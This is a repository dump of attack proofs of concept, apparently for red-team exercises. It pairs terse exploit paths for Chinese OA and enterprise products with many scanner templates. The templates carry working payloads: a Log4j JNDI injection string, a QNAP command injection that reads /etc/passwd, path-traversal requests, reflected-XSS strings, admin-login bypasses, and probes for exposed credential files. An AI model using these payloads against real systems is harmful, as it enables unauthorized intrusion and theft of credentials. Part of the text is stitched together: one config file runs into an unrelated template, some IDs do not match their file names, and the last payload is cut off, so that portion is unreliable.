├── 蓝凌OA未授权
├── shell.txt
├── url.txt
├── READEME
│ ├── image-20220802090453235.png
│ ├── image-20220802090521854.png
│ ├── image-20220802091136108.png
│ └── image-20220802091436656.png
├── rce.py
└── README.md
├── 致远OA.md
├── 网康科技网关RCE.md
├── 帆软报表反序列化.md
├── 安恒明御网关注入.md
├── TRS-WAS远程命令执行.md
├── WebLogic反序列化RCE路径探测.md
├── 帆软1day.md
├── 用友u8 cloud任意文件上传漏洞.md
├── Apache Log4j2 RCE.md
├── H3C企业路由器(ER、ERG2、GR系列)任意用户登录.md
├── 用友NC系统uapws wsdl XXE漏洞.md
├── 用友时空KSOA软件前台文件上传漏洞.md
├── 用友FE协作办公平台templateOfTaohong_manager.jsp目录遍历.md
├── 泛微OA-0day管理员任意登录.md
├── 禅道注入
├── .idea
│ ├── vcs.xml
│ ├── .gitignore
│ ├── modules.xml
│ └── zentao.iml
└── README.md
├── 泛微E-office do_excel.php任意文件写入漏洞.md
├── 禅道 v16.5 SQL注入.md
├── 用友GRP-U8财务管理软件任意文件上传.md
├── Fastjson代码执行漏洞 [CVE-2022-25845].md
├── 通达OA登录认证绕过.md
├── 红帆医疗云OA医用版前台SQL注入漏洞.md
├── 海康威视综合运营管理平台RCE.md
├── nuclei_pocs
├── squid-detect.yaml
├── werkzeug-debug.yaml
├── go-pprof.yaml
├── munin-monitoring.yaml
├── dir-listing.yaml
├── php-debug-bar.yaml
├── graphite-browser-detect.yaml
├── opengear-detect.yaml
├── apache-loadbalancer.yaml
├── apache-serverstatus.yaml
├── x-hacker.yaml
├── telerik-derserial.yaml
├── aws-ec2-sto.yaml
├── ffserver-detect.yaml
├── kube-dashboard-detect.yaml
├── axis2-detect.yaml
├── missing-csp.yaml
├── Django-DebugMode.yaml
├── symfony-detect.yaml
├── kubernetes-api-detect.yaml
├── clickhouse-db-detect.yaml
├── display-via-header.yaml
├── apache-druid-detect.yaml
├── docker-k8s.yaml
├── exposed-hg.yaml
├── php-ini.yaml
├── tor-socks-proxy.yaml
├── CVE-2020-15004.yaml
├── fps-config.yaml
├── kafka-misconfig.yaml
├── pi-hole-detect.yaml
├── aws-metadata.yaml
├── host-header-injection.yaml
├── SquirrelMail.yaml
├── admin-file-search.yaml
├── clickhouse-db-unauth.yaml
├── exposed-darcs.yaml
├── htpasswd-detection.yaml
├── php-fpm-status.yaml
├── hadoop-unauth.yaml
├── npmrc.yaml
├── CVE-2020-14750.yaml
├── connect-proxy.yaml
├── schneider-lights.yaml
├── zeroshell-kerbynet-lfd.yaml
├── kong-detect.yaml
├── rocketmq-console.yaml
├── simple-xss.yaml
├── CVE-2019-11043.yaml
├── apache-nifi-unauth.yaml
├── laravel-telescope-exposed.yaml
├── tox-ini.yaml
├── basic-auth-detection.yaml
├── zipkin-unauth.yaml
├── terraform-detect.yaml
├── elasticsearch-cluster-health.yaml
├── joomla-host-injection.yaml
├── wordpress-rest-api.yaml
├── iis-directory-listing.yaml
├── redis-conf.yaml
├── globalprotect-xss.yaml
├── host-header-auth-bypass.yaml
├── CVE-2019-7192.yaml
├── header-blind-ssrf.yaml
├── sonarqube-cred.yaml
├── google-floc-disabled.yaml
├── CVE-2020-5398.yaml
├── circleci-ssh-config.yaml
├── detect-rsyncd.yaml
├── vernemq-status.yaml
├── CVE-2020-9054.yaml
├── git-credentials.yaml
├── goliath-detect.yaml
├── kubeflow-dashboard-unauth.yaml
├── lucee-detect.yaml
├── CVE-2018-16341.yaml
├── CVE-2019-19368.yaml
├── CVE-2020-8163.yaml
├── php-user-ini.yaml
├── wordpress-user-enum.yaml
├── CVE-2005-2428.yaml
├── CVE-2018-18264.yaml
├── circleci-config.yaml
├── django-debug.yaml
├── ws-config.yaml
├── CVE-2018-7490.yaml
├── magento-config.yaml
├── nginx-vhost-traffic-status.yaml
├── content_injection.yaml
├── rails-secret-token.yaml
├── CVE-2020-10220.yaml
├── mrtg-detect.yaml
├── CVE-2020-11450.yaml
├── CVE-2020-27982.yaml
├── detect-drone.yaml
├── moodle-auth-xss.yaml
├── CVE-2019-1653.yaml
├── CVE-2020-7246.yaml
├── cors-00.yaml
├── gogs-install-exposure.yaml
├── jupyter-ipython-unauth.yaml
├── CVE-2019-16278.yaml
├── CVE-2019-18394.yaml
├── CVE-2020-5777.yaml
├── comtrend-ct5367-remote-root.yaml
├── dbeaver-data-sources.yaml
├── dockercfg.yaml
├── redmine-cli-detect.yaml
├── s3cfg.yaml
├── CVE-2018-3714.yaml
├── CVE-2020-0618.yaml
├── pinpoint-unauth.yaml
├── CVE-2017-14849.yaml
├── CVE-2017-9506.yaml
├── CVE-2019-19719.yaml
├── CVE-2020-14181.yaml
├── CVE-2020-3187.yaml
├── CVE-2020-7048.yaml
├── CVE-2021-22122.yaml
├── exposed-bitkeeper.yaml
├── kafdrop-xss.yaml
├── zabbix-creds.yaml
├── CVE-2019-8903.yaml
├── CVE-2020-24765.yaml
├── homeworks-illumination-web-keypad.yaml
├── CVE-2018-0296.yaml
├── CVE-2018-11759.yaml
├── CVE-2020-13937.yaml
├── CVE-2020-15129.yaml
├── CVE-2020-16270.yaml
├── CVE-2020-25213.yaml
├── CVE-2021-20837.yaml
├── CVE-2019-11248.yaml
├── CVE-2018-14728.yaml
├── CVE-2019-11580.yaml
├── CVE-2020-11530.yaml
├── CVE-2020-12271.yaml
├── CVE-2020-24312.yaml
├── ssh-known-hosts.yaml
├── CVE-2019-12314.yaml
├── CVE-2020-5410.yaml
├── eyelock-nano-lfd.yaml
├── go-pprof-exposed.yaml
├── java-melody-stat.yaml
├── pagespeed-global-admin.yaml
├── CVE-2019-17382.yaml
├── CVE-2019-8982.yaml
├── kentico-open-redirect.yaml
├── salesforce-login.yaml
├── swagger-xss.yaml
├── ventrilo-config.yaml
├── CVE-2018-20824.yaml
├── CVE-2018-9126.yaml
├── CVE-2019-8449.yaml
├── CVE-2020-11710.yaml
├── CVE-2018-3167.yaml
├── CVE-2020-15920.yaml
├── CVE-2020-8772.yaml
├── CVE-2019-3799.yaml
├── CVE-2020-2140.yaml
├── CVE-2020-8512.yaml
├── php-symfony-debug.yaml
├── ssh-authorized-keys.yaml
├── CVE-2017-6360.yaml
├── docker-registry.yaml
├── ganglia-xml-grid-monitor.yaml
├── CVE-2018-20062.yaml
├── CVE-2019-9082.yaml
├── CVE-2019-9978.yaml
├── circarlife-default-login.yaml
├── exposed-bzr.yaml
├── tectuus-scada-monitor.yaml
├── CVE-2018-16763.yaml
├── CVE-2019-0230.yaml
├── CVE-2019-19908.yaml
├── esmtprc.yaml
├── pmb-directory-traversal.yaml
├── CVE-2020-5412.yaml
├── lutron-iot-default-login.yaml
├── CVE-2019-11510.yaml
├── CVE-2019-16662.yaml
├── CVE-2020-7209.yaml
├── nginx-vhost-xss.yaml
├── sftp-config.yaml
├── CVE-2020-2199.yaml
├── CVE-2020-24223.yaml
├── CVE-2020-7473.yaml
├── CVE-2021-33904.yaml
├── apache-druid-unauth.yaml
├── ftpconfig.yaml
├── sap-directory-listing.yaml
├── CVE-2018-18326.yaml
├── CVE-2018-19386.yaml
├── CVE-2018-2894.yaml
├── CVE-2019-14974.yaml
├── selea-ip-camera.yaml
├── CVE-2019-14696.yaml
├── CVE-2020-16952.yaml
├── CVE-2020-5284.yaml
├── CVE-2020-8115.yaml
├── gloo-unauth.yaml
├── gmail-api-client-secrets.yaml
├── joomla-lfi-comfabrik.yaml
├── pyramid-debug-toolbar.yaml
├── redmine-db-config.yaml
├── CVE-2014-2323.yaml
├── CVE-2017-0929.yaml
├── CVE-2017-16806.yaml
├── CVE-2020-11034.yaml
├── jetty-information-disclosure.yaml
├── CVE-2018-11784.yaml
├── CVE-2018-1247.yaml
├── CVE-2018-5230.yaml
├── CVE-2020-8091.yaml
├── CVE-2020-8982.yaml
├── CVE-2021-26475.yaml
├── avtech-dvr-exposure.yaml
├── zwave2mqtt-health-check.yaml
├── CVE-2017-7391.yaml
├── CVE-2018-1000129.yaml
├── CVE-2018-18069.yaml
├── CVE-2019-8451.yaml
├── CVE-2020-14179.yaml
├── CVE-2020-8209.yaml
├── CVE-2017-6361.yaml
├── CVE-2018-1271.yaml
├── config-file.yaml
├── django-secret.key.yaml
├── netdata-unauth.yaml
├── robomongo.yaml
├── wp-ambience-xss.yaml
├── CVE-2012-4242.yaml
├── CVE-2017-7529.yaml
├── CVE-2018-19439.yaml
├── CVE-2018-6389.yaml
├── CVE-2019-14322.yaml
├── CVE-2019-16759.yaml
├── CVE-2020-16139.yaml
├── CVE-2020-24550.yaml
├── CVE-2020-9484.yaml
├── header_blind_xss.yaml
├── php-timeclock-xss.yaml
├── CVE-2009-0545.yaml
├── CVE-2012-2371.yaml
├── CVE-2018-16670.yaml
├── CVE-2019-6112.yaml
├── CVE-2012-5913.yaml
├── CVE-2018-12634.yaml
├── CVE-2019-19985.yaml
├── CVE-2019-20141.yaml
├── CVE-2020-2551.yaml
├── CVE-2011-5179.yaml
├── CVE-2019-12461.yaml
├── CVE-2020-17506.yaml
├── CVE-2021-31581.yaml
├── remote-sync.yaml
├── CVE-2011-4624.yaml
├── CVE-2011-4926.yaml
├── CVE-2018-2791.yaml
├── dbeaver-credentials.yaml
├── joomla-sqli-hdwplayer.yaml
├── wordpress-directory-listing.yaml
├── CVE-2018-16668.yaml
├── CVE-2020-14882-2.yaml
├── wp-finder-xss.yaml
├── CVE-2020-22840.yaml
├── chamilo-lms-xss.yaml
├── laravel-telescope.yaml
├── wp-knews-xss.yaml
├── CVE-2011-4618.yaml
└── CVE-2014-9094.yaml
└── F5 BIG-IP RCE exploitation (CVE-2022-1388).md
/蓝凌OA未授权/shell.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/蓝凌OA未授权/url.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/致远OA.md:
--------------------------------------------------------------------------------
1 | ## 致远OA
2 |
3 | ```
4 | /NewsTodayUIBV.phphp
5 | ```
6 |
--------------------------------------------------------------------------------
/网康科技网关RCE.md:
--------------------------------------------------------------------------------
1 | ## 网康科技网关RCE
2 |
3 | ```
4 | /scripts/aitrain.php
5 | ```
6 |
--------------------------------------------------------------------------------
/帆软报表反序列化.md:
--------------------------------------------------------------------------------
1 | ## 帆软报表反序列化
2 |
3 | ```
4 | webroot/decision/remote/design/channel
5 | ```
6 |
--------------------------------------------------------------------------------
/安恒明御网关注入.md:
--------------------------------------------------------------------------------
1 | ## 安恒明御网关注入
2 |
3 | ```
4 | /webui/?g=aaa_portal_auth_config_reset&type=1
5 | ```
6 |
--------------------------------------------------------------------------------
/TRS-WAS远程命令执行.md:
--------------------------------------------------------------------------------
1 | ## TRS-WAS远程命令执行
2 |
3 | ```
4 | /mas/sysinfo/testCommandExecutor.jsp
5 | ```
6 |
--------------------------------------------------------------------------------
/WebLogic反序列化RCE路径探测.md:
--------------------------------------------------------------------------------
1 | ## WebLogic 反序列化远程命令执行路径探测
2 |
3 | ```
4 | /_async/AsyncResponseService
5 | ```
6 |
--------------------------------------------------------------------------------
/帆软1day.md:
--------------------------------------------------------------------------------
1 |
2 | ## 帆软1day
3 |
4 | ```
5 | /webroot/decision/view/form?op=chartlink&cmd=refresh_relate_data
6 | ```
7 |
--------------------------------------------------------------------------------
/用友u8 cloud任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友u8 cloud任意文件上传漏洞/nccloud前台文件上传
2 |
3 | ```
4 | /hrss/servlet/uploadimg2File
5 | ```
6 |
--------------------------------------------------------------------------------
/Apache Log4j2 RCE.md:
--------------------------------------------------------------------------------
1 | ## Apache Log4j 2 远程代码执行
2 |
3 | ```
4 | (){:;}{$:;$}{jndi:rmi${{::-:}}}//dnslog/test
5 | ```
6 |
--------------------------------------------------------------------------------
/H3C企业路由器(ER、ERG2、GR系列)任意用户登录.md:
--------------------------------------------------------------------------------
1 | ## H3C企业路由器(ER、ERG2、GR系列)任意用户登录/命令执行
2 |
3 | ```
4 | /userLogin.asp/actionpolicy_status/
5 | ```
6 |
--------------------------------------------------------------------------------
/用友NC系统uapws wsdl XXE漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友NC系统uapws wsdl XXE
2 |
3 | ```
4 | /uapws/service/nc.uap.oba.update.IUpdateService?xsd={{{xmlUrl}}}
5 | ```
6 |
--------------------------------------------------------------------------------
/用友时空KSOA软件前台文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ## 用友时空KSOA软件前台文件上传漏洞
2 |
3 | ```
4 | /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=gmtxj.jsp
5 | ```
6 |
--------------------------------------------------------------------------------
/蓝凌OA未授权/READEME/image-20220802090453235.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MY0723/2022-Hvv-POC/HEAD/蓝凌OA未授权/READEME/image-20220802090453235.png
--------------------------------------------------------------------------------
/蓝凌OA未授权/READEME/image-20220802090521854.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MY0723/2022-Hvv-POC/HEAD/蓝凌OA未授权/READEME/image-20220802090521854.png
--------------------------------------------------------------------------------
/蓝凌OA未授权/READEME/image-20220802091136108.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MY0723/2022-Hvv-POC/HEAD/蓝凌OA未授权/READEME/image-20220802091136108.png
--------------------------------------------------------------------------------
/蓝凌OA未授权/READEME/image-20220802091436656.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MY0723/2022-Hvv-POC/HEAD/蓝凌OA未授权/READEME/image-20220802091436656.png
--------------------------------------------------------------------------------
/用友FE协作办公平台templateOfTaohong_manager.jsp目录遍历.md:
--------------------------------------------------------------------------------
1 | ## 用友FE协作办公平台 templateOfTaohong_manager.jsp目录遍历
2 |
3 | ```
4 | /system/mediafile/templateofTaoHong_manager.jsp?path={{{path}}}
5 | ```
6 |
--------------------------------------------------------------------------------
/泛微OA-0day管理员任意登录.md:
--------------------------------------------------------------------------------
1 | ## 泛微OA-0day管理员任意登录
2 |
3 |
4 | > URL
5 | ```
6 | /mobile/plugin/VerifyQuickLogin.jsp
7 | ```
8 |
9 | > Payload
10 | ```
11 | identifier=1&language=1&ipaddress=
12 | ```
13 |
--------------------------------------------------------------------------------
/禅道注入/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
This domain is for use in illustrative examples in documents.') 22 | references: 23 | - https://www.cvebase.com/cve/2019/8451 24 | -------------------------------------------------------------------------------- /nuclei_pocs/CVE-2020-14179.yaml: -------------------------------------------------------------------------------- 1 | id: cve-2020-14179 2 | info: 3 | name: Jira Information Leak 4 | risk: Medium 5 | 6 | params: 7 | - root: '{{.BaseURL}}' 8 | 9 | variables: 10 | - endpoint: | 11 | secure/QueryComponent 12 | requests: 13 | - method: GET 14 | url: >- 15 | {{.root}}/{{.endpoint}}!Default.jspa 16 | headers: 17 | - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 18 | - Referer: "{{.root}}/webadmin/admin/service_manager_data.php" 19 | detections: 20 | - >- 21 | StatusCode() == 200 && (StringSearch("resBody", "searchers") || StringSearch("resBody", "groups")) 22 | 23 | references: 24 | - https://www.cvebase.com/cve/2020/14179 25 | -------------------------------------------------------------------------------- /nuclei_pocs/CVE-2020-8209.yaml: -------------------------------------------------------------------------------- 1 | id: cve-2020-8209 2 | info: 3 | name: Xenmobile LFI CVE-2020-8209 4 | risk: High 5 | 6 | 7 | params: 8 | - root: '{{.BaseURL}}' 9 | 10 | variables: 11 | - file: | 12 | ../../../../../etc/passwd 13 | ../../../../../c:/windows/win.ini 14 | requests: 15 | - method: GET 16 | redirect: false 17 | url: >- 18 | {{.root}}/jsp/help-sb-download.jsp?sbFileName={{.file}} 19 | headers: 20 | detections: 21 | - >- 22 | StringSearch("response", "root:") && StringSearch("response", "/bin/bash") 23 | - >- 24 | StatusCode() == 200 && StringSearch("body", "[extensions]") && StringSearch("body", "[fonts]") 25 | references: 26 | - link: https://twitter.com/ptswarm/status/1328346259502018560/photo/1 27 | -------------------------------------------------------------------------------- /nuclei_pocs/CVE-2017-6361.yaml: -------------------------------------------------------------------------------- 1 | id: cve-2017-6361 2 | info: 3 | name: QNAP QTS RCE 4 | risk: Critical 5 | 6 | params: 7 | - root: '{{.BaseURL}}' 8 | 9 | variables: 10 | - endpoint: | 11 | cgi-bin/authLogin.cgi 12 | requests: 13 | - method: GET 14 | url: >- 15 | {{.root}}/{{.endpoint}}?reboot_notice_msg=$(printf "QNAPVJBD%08d%16s 14`(echo;cat%20/etc/passwd)>&2`" $(expr $(date +%s) % 100000000) Disconnect|base64|tr -d "\r\n") 16 | headers: 17 | - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 18 | detections: 19 | - >- 20 | StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") 21 | references: 22 | - https://www.cvebase.com/cve/2017/6360 23 | -------------------------------------------------------------------------------- /nuclei_pocs/CVE-2018-1271.yaml: -------------------------------------------------------------------------------- 1 | id: cve-2018-1271 2 | info: 3 | name: Spring MVC Path Traversal 4 | risk: High 5 | 6 | params: 7 | - root: '{{.BaseURL}}' 8 | 9 | variables: 10 | - endpoint: | 11 | static/ 12 | spring-mvc-showcase/resources/ 13 | requests: 14 | - method: GET 15 | url: >- 16 | {{.root}}/{{.endpoint}}%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini 17 | headers: 18 | - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 19 | detections: 20 | - >- 21 | StatusCode() == 200 && StringSearch("resBody", "for 16-bit app support") 22 | references: 23 | - https://www.cvebase.com/cve/2018/1271 24 | -------------------------------------------------------------------------------- /nuclei_pocs/config-file.yaml: -------------------------------------------------------------------------------- 1 | id: config-file 2 | 3 | info: 4 | name: Detect Config File 5 | author: geeknik 6 | severity: high 7 | tags: config,auth,api 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/config/default.json" 13 | - "{{BaseURL}}/config.json" 14 | - "{{BaseURL}}/config/config.json" 15 | - "{{BaseURL}}/credentials/config.json" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | words: 21 | - '"api_keys":' 22 | - '"accessKey":' 23 | - '"secretKey":' 24 | condition: or 25 | - type: status 26 | status: 27 | - 200 28 | - type: word 29 | words: 30 | - "application/json" 31 | part: header 32 | -------------------------------------------------------------------------------- /nuclei_pocs/django-secret.key.yaml: -------------------------------------------------------------------------------- 1 | id: django-secret-key 2 | 3 | info: 4 | name: Django Secret Key 5 | author: geeknik 6 | severity: high 7 | tags: django 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/settings.py" 13 | - "{{BaseURL}}/app/settings.py" 14 | - "{{BaseURL}}/django/settings.py" 15 | - "{{BaseURL}}/settings/settings.py" 16 | - "{{BaseURL}}/web/settings/settings.py" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: status 21 | status: 22 | - 200 23 | - type: word 24 | part: body 25 | words: 26 | - "SECRET_KEY =" 27 | - type: word 28 | part: header 29 | words: 30 | - "text/html" 31 | negative: true 32 | -------------------------------------------------------------------------------- /nuclei_pocs/netdata-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: netdata-unauth 2 | info: 3 | name: Netdata Unauth 4 | risk: Medium 5 | 6 | params: 7 | - root: '{{.BaseURL}}' 8 | 9 | requests: 10 | - method: GET 11 | redirect: false 12 | url: >- 13 | {{.root}}/api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait 14 | headers: 15 | - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 16 | detections: 17 | - >- 18 | StatusCode() == 200 && && StringSearch("resHeaders", "application/json") && StringSearch("response", "view_update_every") && StringSearch("response", "dimensions") 19 | 20 | references: 21 | - repo: https://github.com/netdata/netdata -------------------------------------------------------------------------------- /nuclei_pocs/robomongo.yaml: -------------------------------------------------------------------------------- 1 | id: robomongo 2 | 3 | info: 4 | name: Detect robomongo.json 5 | author: geeknik 6 | description: MongoDB credentials file used by RoboMongo 7 | severity: high 8 | tags: mongodb,robomongo,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/db/robomongo.json" 14 | - "{{BaseURL}}/robomongo.json" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: header 20 | words: 21 | - "application/json" 22 | - type: word 23 | words: 24 | - "databaseName" 25 | - "userName" 26 | - "userPassword" 27 | - "serverHost" 28 | condition: and 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /nuclei_pocs/wp-ambience-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wp-ambience-xss 2 | 3 | info: 4 | name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: https://www.exploit-db.com/exploits/38568 8 | tags: wordpress,xss,wp-plugin 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "
" 20 | part: body 21 | 22 | - type: word 23 | part: header 24 | words: 25 | - text/html 26 | 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /nuclei_pocs/CVE-2012-4242.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2012-4242 2 | 3 | info: 4 | name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS) 5 | author: daffainfo 6 | severity: medium 7 | reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242 8 | tags: cve,cve2012,wordpress,xss,wp-plugin 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "" 20 | part: body 21 | 22 | - type: word 23 | part: header 24 | words: 25 | - text/html 26 | 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /nuclei_pocs/CVE-2017-7529.yaml: -------------------------------------------------------------------------------- 1 | id: cve-2017-7529 2 | info: 3 | name: Nginx Remote Integer Overflow 4 | risk: Medium 5 | 6 | params: 7 | - root: '{{.BaseURL}}' 8 | 9 | variables: 10 | requests: 11 | - method: GET 12 | url: >- 13 | {{.root}}/ 14 | headers: 15 | - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 16 | - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 17 | - Range: bytes=-17208,-9223372036854758792 18 | 19 | detections: 20 | - >- 21 | StatusCode() == 206 && StringSearch("resHeaders", "Server: nginx") && StringSearch("resBody", "Content-Range") 22 | references: 23 | - https://www.cvebase.com/cve/2017/7529 24 | -------------------------------------------------------------------------------- /nuclei_pocs/CVE-2018-19439.yaml: -------------------------------------------------------------------------------- 1 | id: cve-2018-19349 2 | info: 3 | name: Oracle SGD XSS 4 | risk: High 5 | 6 | params: 7 | - root: '{{.BaseURL}}' 8 | 9 | variables: 10 | - endpoint: | 11 | sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp 12 | requests: 13 | - method: GET 14 | url: >- 15 | {{.root}}/{{.endpoint}}?=&windowTitle=AdministratorHelpWindow>